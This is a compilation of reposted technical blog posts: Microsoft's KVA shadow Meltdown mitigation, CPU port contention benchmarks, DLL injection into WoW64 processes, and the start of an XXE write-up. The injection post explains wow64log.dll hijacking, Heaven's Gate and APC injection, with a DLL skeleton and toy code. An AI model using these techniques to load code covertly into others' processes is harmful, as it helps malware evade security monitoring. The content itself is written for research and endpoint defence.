The first optimization, the usage of PCID (process-context identifier) acceleration, is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached in the processor’s TB; then, on an address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces. 
This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). 
User/global acceleration

Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors, do not provide hardware support for PCID and thus cannot use it to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations, including global translations, is provided by the processor for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit thus elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. 
Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global.

Privileged process acceleration

The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. 
KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications.

Optimizations are ongoing

The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort.

Driver and application compatibility

A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. 
Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure.

Conclusion

Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. 
In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities. Ken Johnson, Microsoft Security Response Center (MSRC) Sursa: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
-
Understanding CPU port contention. 21 Mar 2018

I continue writing about performance of the processors, and today I want to show some examples of issues that can arise in the CPU backend. In particular, today’s topic will be CPU port contention. Modern processors have multiple execution units. For example, in the Sandy Bridge family there are 6 execution ports:
Ports 0, 1, 5 are for arithmetic and logic operations (ALU).
Ports 2, 3 are for memory reads.
Port 4 is for memory writes.
Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, will present easy to understand pipeline diagrams and even try IACA. It will be very interesting, so keep on reading! Disclaimer: I don’t want to describe some nuances of IvyBridge architecture, but rather to show how port contention might look in practice.

Utilizing full capacity of the load instructions

In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at the first example, where I will read one cache line (64 bytes) in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make reads within one cache line in order to eliminate cache effects. I will repeat this 1000 times:

max load capacity
; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
dec edi
jnz .loop

I think there will be no issue with loading values into the same eax register, because the CPU will use register renaming to solve this write-after-write dependency. 
Performance counters that I use
UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X.
UOPS_EXECUTED.STALL_CYCLES - Counts number of cycles no uops were dispatched to be executed on this thread.
UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops were executed per-thread.
Full list of performance counters for IvyBridge can be found here.

Results

I did my experiments on an IvyBridge CPU using the uarch-bench tool.

Benchmark           Cycles  UOPS.PORT2  UOPS.PORT3  UOPS.PORT5
max load capacity   8.02    8.00        8.00        1.00

We can see that our 16 loads were scheduled equally between PORT2 and PORT3; each port takes 8 uops. PORT5 takes the MacroFused uop produced from the dec and jnz instructions. The same picture can be observed if we use the IACA tool (good explanation how to use IACA):

Architecture - IVB
Throughput Analysis Report
--------------------------
Block Throughput: 8.00 Cycles
Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA

Port Binding In Cycles Per Iteration:
-------------------------------------------------------------------------
|  Port  | 0 - DV  |  1  |  2 - D  |  3 - D  |  4  |  5  |
-------------------------------------------------------------------------
| Cycles | 0.0 0.0 | 0.0 | 8.0 8.0 | 8.0 8.0 | 0.0 | 1.0 |
-------------------------------------------------------------------------

N - port number or number of cycles resource conflict caused delay,
DV - Divider pipe (on port 0)
D - Data fetch pipe (on ports 2 and 3), CP - on a critical path
F - Macro Fusion with the previous instruction occurred

| Num Of |        Ports pressure in cycles         |    |
|  Uops  | 0 - DV | 1 |  2 - D  |  3 - D  | 4 | 5 |    |
---------------------------------------------------------------------
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x4]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x8]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0xc]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x10]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x14]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x18]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x1c]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x20]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x24]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x28]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x2c]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x30]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x34]
|   1    |        |   | 1.0 1.0 |         |   |   | CP | mov eax, dword ptr [rsp+0x38]
|   1    |        |   |         | 1.0 1.0 |   |   | CP | mov eax, dword ptr [rsp+0x3c]
|   1    |        |   |         |         |   | 1.0 |  | dec rdi
|   0F   |        |   |         |         |   |     |  | jnz 0xffffffffffffffbe
Total Num Of Uops: 17

Why do we have 8 cycles per iteration?

On modern x86 processors a load instruction takes at least 4 cycles to execute, even when the data is in the L1 cache, although according to Agner’s instruction_tables.pdf it has 2 cycles latency. Even if we assume a latency of 2 cycles, without pipelining we would have 16 [loads] * 2 [cycles] / 2 [ports] = 16 cycles. According to these calculations we should get 16 cycles per iteration. But we are running at 8 cycles per iteration. Why does this happen? Well, like most execution units, load units are also pipelined, meaning that we can start a second load while the first load is in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on. This is a simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages:
F (fetch)
D (decode)
I (issue)
E (execute) or M (memory operation)
W (write back)
It is far from the real execution diagram of my CPU; however, I preserved some important constraints of the IvyBridge architecture (IVB):
IVB front-end fetches a 16B block of instructions in a 16B-aligned window in 1 cycle.
IVB has 4 decoders, each of them able to decode instructions that consist of at least a single uop.
IVB has 2 pipelined units for doing load operations. 
Just to simplify the diagrams, I assume a load operation takes 2 cycles. The M1 and M2 stages reflect that in the diagram. It needs to be said that I omitted one important constraint: instructions always retire in program order; in my later diagrams it’s broken (I simply forgot about it when I was making those diagrams). Drawing this kind of diagram usually helps me understand what is going on inside the processor and find different sorts of hazards.

Some explanations for this pipeline diagram
In the first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B-aligned window as the first 4 loads.
In the second cycle we were able to decode all 4 fetched instructions, because they are all single-uop instructions.
In the third cycle we were able to issue only the first 2 loads. One of the loads goes to PORT2, the second goes to PORT3. Notice that LOAD3 and LOAD4 are stalled (typically waiting in the Reservation Station).
Only in cycle #4 were we able to issue LOAD3 and LOAD4, because we know the M1 stages will be free to use in the next cycle.
Continuing this diagram further, we can see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration. I made an additional experiment to prove this theory. I collected some more performance counters:

Benchmark           Cycles  CYCLES_GE_3_UOP_EXEC  CYCLES_GE_2_UOP_EXEC  CYCLES_GE_1_UOP_EXEC
max load capacity   8.02    1.00                  8.00                  8.00

The results above show that in each of the 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (the last 2 loads + the dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling it in parallel with 2 loads. 
What is even more interesting is that if we do the simulation with the assumption that a load instruction takes 4 cycles latency, all the conclusions in this example will still be valid, because the throughput is what matters (as Travis mentioned in his comment). There will still be 2 retired load instructions each cycle. And that would mean that our 16 loads (inside each iteration) will retire in 8 cycles.

Utilizing other available ports in parallel

In the example that I presented, I’m only utilizing PORT2 and PORT3, and partially PORT5. What does that mean? Well, it means that we can schedule instructions on other ports in parallel with the loads just for free. Let’s try to write such an example. I added one bswap instruction after each pair of loads. This instruction reverses the byte order of a register. It is very helpful for doing big-endian to little-endian conversion and vice versa. There is nothing special about this instruction; I just chose it because it suits my experiments best. According to Agner’s instruction_tables.pdf, a bswap instruction on a 32-bit register is executed on PORT1 and has 1 cycle latency. 
max load capacity + 1 bswap
; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
bswap ebx
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
bswap ebx
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
bswap ebx
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
bswap ebx
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
bswap ebx
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
bswap ebx
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
bswap ebx
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
bswap ebx
dec edi
jnz .loop

Here are the results for this experiment:

Benchmark                     Cycles  UOPS.PORT1  UOPS.PORT2  UOPS.PORT3  UOPS.PORT5
max load capacity + 1 bswap   8.03    8.00        8.01        8.01        1.00

The first observation is that we get 8 more bswap instructions just for free (we are still running at 8 cycles per iteration), because they do not contend with the load instructions. Let’s look at the pipeline diagram for this case: We can see that all bswap instructions nicely fit into the pipeline, causing no hazards.

Overutilizing ports

Modern compilers will try to schedule instructions for a particular target architecture to fully utilize all execution ports. But what happens when we try to schedule too many instructions for some execution port? Let’s see. 
I added one more bswap instruction after each pair of loads:

port 1 throughput bottleneck
; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
bswap ebx
bswap ecx
dec edi
jnz .loop

When I measured the result using the uarch-bench tool, here is what I received:

Benchmark                      Cycles  UOPS.PORT1  UOPS.PORT2  UOPS.PORT3  UOPS.PORT5
port 1 throughput bottleneck   16.00   16.00       8.01        8.01        1.00

To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again: Now it’s clear to see that we have 16 bswap instructions and only one port that can handle this kind of instruction. So, we can’t go faster than 16 cycles in this case, because the IVB processor executes them sequentially. Different architectures might have more ports to handle bswap instructions, which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know the limitations of your hardware!

Additional resources

More detailed information about the execution ports of your processor can be found in Agner’s microarchitecture.pdf and, for Intel processors, in Intel’s optimization manual. All the assembly examples that I showed in this article are available on my github.

UPD 23.03.2018

Several people mentioned that load instructions can’t have 2 cycles latency on modern Intel architectures. Agner’s tables seem to be inaccurate there. 
I will not redo the diagrams, as it would be difficult to understand them, and they would shift the focus from the actual thing I wanted to explain. Again, I didn’t want to reconstruct how the pipeline diagram would look in reality, but rather to explain the notion of port contention. However, I fully accept the comment, and it should be mentioned. Also, if we assume that a load instruction takes 4 cycles latency in those examples, all the conclusions in the post are still valid, because the throughput is what matters (as Travis mentioned in his comment). There will still be 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in the HackerNews comments. Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
-
DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1
By Yarden Shafir and Assaf Carlsbad - March 12, 2018

Introduction

This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. 
All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions.

Injection Methods

Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series.

Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL)

After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods.

Hijacking wow64log.dll

As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. 
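Per Walied Assar’s research, that export set consists of Wow64LogInitialize, Wow64LogSystemService, Wow64LogMessageArgList and Wow64LogTerminate. A hedged skeleton of such a DLL is sketched below; the interface is undocumented, so the NTSTATUS-returning prototypes and parameter lists are assumptions, and portable typedefs are used so the sketch compiles outside a Windows build environment:

```c
#include <stdarg.h>

/* Hedged sketch of a minimal wow64log.dll. The export names follow
 * Walied Assar's research; the exact signatures are undocumented, so
 * everything below is an assumption. Returning a success status from
 * Wow64LogInitialize is what keeps the DLL loaded in the process. */
typedef long NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0)

#ifdef _WIN32
#define WOW64LOG_EXPORT __declspec(dllexport)
#else
#define WOW64LOG_EXPORT   /* allow the sketch to build on other platforms */
#endif

/* Assumed to be called once when wow64.dll initializes the process. */
WOW64LOG_EXPORT NTSTATUS Wow64LogInitialize(void)
{
    /* An injected payload could set up its hooks or IPC here. */
    return STATUS_SUCCESS;
}

/* Assumed to be invoked around WoW64-translated system services;
 * the parameter layout is undocumented. */
WOW64LOG_EXPORT NTSTATUS Wow64LogSystemService(void *service_parameters)
{
    (void)service_parameters;
    return STATUS_SUCCESS;
}

WOW64LOG_EXPORT NTSTATUS Wow64LogMessageArgList(unsigned long level,
                                                const char *format,
                                                va_list args)
{
    (void)level; (void)format; (void)args;
    return STATUS_SUCCESS;
}

WOW64LOG_EXPORT NTSTATUS Wow64LogTerminate(void)
{
    return STATUS_SUCCESS;
}
```

Built as a 64-bit DLL (with only NTDLL as an import, per the constraints above) and dropped into system32, the loader does the rest.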
Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32.

Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll

The main advantage of this method lies in its sheer simplicity – all it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method: First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process, as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc.

Heaven’s Gate

More control over the injection process can be achieved by simply issuing the call to LdrLoadDll() ourselves, rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages:
1. Gain the ability to execute arbitrary 32-bit code inside the target process.
2. Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments. 
Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”.

“Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, which switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode.

Figure 3 – a thread executing x86 code, just prior to its transition to the x64 realm

After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand, as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules.

Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate

We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here.

Injection via APC

With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: it is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread.
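As a rough mental model for this mechanism (a routine queued to a particular thread, then run on that thread's behalf), here is a purely illustrative user-space analogy in Python. Nothing below corresponds to the Windows API; real APCs live in the kernel and all the names are invented:

```python
from collections import defaultdict, deque

class ToyApcQueue:
    """User-space analogy of per-thread APC queues (illustration only)."""
    def __init__(self):
        self._queues = defaultdict(deque)  # thread_id -> queued routines

    def queue_apc(self, thread_id, routine, normal_context):
        # Loosely like queueing an APC: attach a routine to one thread.
        self._queues[thread_id].append((routine, normal_context))

    def enter_alertable_wait(self, thread_id):
        # User-mode APCs are delivered only when the owning thread
        # becomes alertable; drain the queue at that point.
        results = []
        q = self._queues[thread_id]
        while q:
            routine, ctx = q.popleft()
            results.append(routine(ctx))
        return results

# Hypothetical routine standing in for an APC procedure.
def load_module(ctx):
    return f"loading {ctx['dll_path']}"

apcs = ToyApcQueue()
apcs.queue_apc(thread_id=4242, routine=load_module,
               normal_context={"dll_path": r"C:\payload\inject64.dll"})
print(apcs.enter_alertable_wait(4242))  # routines run only at this point
```

The key property mirrored here is that queueing and execution are decoupled: the routine runs in the target thread's context, at a time the issuer does not directly control.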
Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types:

Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them.

User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section.

APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system.

In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()), the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules.

The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process.
Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification:

Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h

As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure:

The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process, so using LoadLibrary() and its variants is not possible.

The path to the DLL we wish to load into the process.

Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments:

Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC

To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A). Promising as this seemed, when we attempted to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error.

Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk

Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle.

Appendixes

Appendix A – complete source code for APC injection with adapter thunk

Source: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
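As an aside, the NormalContext/adapter-thunk data flow described above can be mimicked in plain Python to make it concrete. Only the calling convention is modeled (a three-argument routine that unpacks a context holding a loader pointer and a DLL path); the real thunk is position-independent machine code and the real loader is the 64-bit LdrLoadDll(). All names below are invented for illustration:

```python
# The "NormalContext" carries everything the thunk needs: a reference to
# the loader API and the path of the DLL to load (both hypothetical here).
def make_normal_context(loader, dll_path):
    return {"loader": loader, "dll_path": dll_path}

def adapter_thunk(normal_context, system_argument1=None, system_argument2=None):
    # Mirrors KNORMAL_ROUTINE's three-argument shape: unpack the context
    # and forward the DLL path to the supplied loader function.
    ctx = normal_context
    return ctx["loader"](ctx["dll_path"])

# Stand-in for the native LdrLoadDll() (illustration only).
def fake_ldr_load_dll(path):
    return ("loaded", path)

ctx = make_normal_context(fake_ldr_load_dll, r"C:\payload\inject64.dll")
print(adapter_thunk(ctx))  # ('loaded', 'C:\\payload\\inject64.dll')
```

The point of the indirection is the same as in the real thunk: the APC issuer decides at queue time which loader and which DLL path the target thread will use at dispatch time.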
-
Posted on March 24, 2018 by tghawkins

Today, I’d like to share my methodology behind how I found a blind, out-of-band XML external entities attack in a private bug bounty program. I have redacted the necessary information to hide the program’s identity.

